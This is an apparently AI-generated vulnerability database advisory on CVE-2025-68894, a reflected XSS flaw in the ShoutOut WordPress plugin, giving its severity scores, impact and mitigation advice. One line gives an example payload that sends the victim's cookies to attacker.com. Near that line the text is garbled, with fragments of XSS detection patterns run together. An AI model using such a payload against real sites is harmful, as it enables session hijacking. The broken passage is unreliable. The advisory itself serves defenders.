
Cloud Vulnerability DB
A community-led vulnerabilities database
CVE-2025-68894 is a Reflected Cross-Site Scripting (XSS) vulnerability in the ShoutOut WordPress plugin developed by shoutoutglobal. It affects all versions of the plugin up to and including 4.0.2. The vulnerability was published on January 22, 2026, and was reported by Patchstack. It carries a CVSS v3.1 base score of 7.1 (High), as assessed by CISA-ADP (NVD, Patchstack).
The vulnerability is classified as CWE-79 (Improper Neutralization of Input During Web Page Generation), specifically a Reflected XSS variant. It arises from insufficient sanitization or escaping of user-supplied input that is reflected back in the plugin's web page output without proper encoding. An attacker can craft a malicious URL containing a JavaScript payload that, when visited by a victim, executes in the context of the victim's browser session. No authentication is required to exploit this vulnerability, though user interaction (clicking a crafted link) is necessary (NVD, Patchstack).
Successful exploitation allows an attacker to execute arbitrary JavaScript in the browser of a victim who clicks a malicious link, potentially leading to session cookie theft, credential harvesting, or unauthorized actions performed on behalf of the victim. The CVSS scope is marked as Changed, meaning the impact extends beyond the vulnerable component itself to the victim's browser context. Confidentiality, integrity, and availability are all assessed as Low impact, reflecting the typical risk profile of a reflected XSS in a WordPress plugin (NVD).
No public proof-of-concept exploit code or evidence of active in-the-wild exploitation has been identified for this vulnerability. The EPSS score is approximately 0.029% (0.000290), indicating a very low probability of exploitation in the near term. The vulnerability is not listed in the CISA Known Exploited Vulnerabilities (KEV) catalog. No threat actor attribution has been reported (NVD, Patchstack).
https://target-site.com/?vulnerable_param=<script>document.location='https://attacker.com/steal?c='+document.cookie</script>.<script>, javascript:, onerror=, onload=) in query parameters.%3Cscript%3E, %22, %27) in query strings associated with ShoutOut plugin endpoints.WordPress site administrators should update the ShoutOut plugin to a version beyond 4.0.2 if a patched release is available, or deactivate and remove the plugin until a fix is confirmed. As a general workaround, a Web Application Firewall (WAF) with XSS filtering rules can help block malicious reflected XSS payloads. Administrators should also review plugin update channels and monitor the Patchstack or WordPress plugin repository for a patched release (Patchstack, NVD).
The vulnerability was noted in Wordfence's weekly WordPress vulnerability report covering January 19–25, 2026, which aggregates newly disclosed plugin vulnerabilities for the WordPress community (Wordfence Blog). No significant independent researcher commentary or broader media coverage has been identified beyond standard vulnerability database listings.
Source: This report was generated using AI
Free Vulnerability Assessment
Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.
Get a personalized demo
"Best User Experience I have ever seen, provides full visibility to cloud workloads."
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
"We know that if Wiz identifies something as critical, it actually is."